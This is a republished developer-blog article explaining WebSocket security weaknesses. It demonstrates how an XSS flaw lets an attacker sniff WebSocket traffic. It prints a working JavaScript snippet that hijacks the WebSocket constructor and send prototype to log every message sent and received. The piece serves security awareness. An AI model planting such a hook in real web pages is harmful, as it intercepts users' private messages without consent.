XSS-Track as a HTML5 WebSockets traffic sniffer
Join the DZone community and get the full member experience.
Join For FreeThat being said, developers must know that using WebSockets will always have some security issues. Just to name the few:
- the client can be spoofed (it doesn't have to be the browser)
- ws:// server can't be trusted (MiTM attacks)
- you need to handle the authentication
- the communication over ws:// protocol is plaintext.
What could get wrong?
There are many possibilities, but for today let's focus on this:It's important to know that WebSockets (without any additional precautions) is not a channel to send restricted messages through, because e.g. a single XSS flaw on client side could reveal all those private bits to the attacker.
Demo
How was that possible?
No rocket science here, just modifying WebSockets built-in object:
if (captureWebsocket && window.WebSocket) { // add logging onmessage listener function captureRecv(ws) { if (typeof ws.captured == 'undefined') { ws.addEventListener('message', function(e) { var event = { event: 'websocket_recv', from: location, data: e.data, url: e.target.URL } log(event); }); ws.captured = true; } } // capture sending var captureSend = this.contentWindow.WebSocket.prototype.send = function() { captureRecv(this); // in case socket contruction was before constructor switching var event = { event: 'websocket_send', from: location, data: arguments[0], url: this.URL }; log(event); return window.WebSocket.prototype.send.apply(this, arguments); } // capture constructor this.contentWindow.WebSocket = function(a,b) { var base; base = (typeof b !== "undefined") ? new WebSocket(a,b) : new WebSocket(a); captureRecv(base); base.send = captureSend; this.__proto__ = WebSocket.constructor; return base; } }
As always, you can see the source code yourself.
Update: I've just found out this
technique of manipulating prototype object to change behavior actually
got a name of 'Prototype Hijacking' and was used by Stefano di Paola in 2007 to hijack plain old AJAX communication.
Of course, Javascript using it's prototypal inheritance needs to have
this kind of 'weakness' and I consider this a brilliant feature of the
language itself. Javascript FTW!
Published at DZone with permission of Krzysztof Kotowicz , DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own.
Comments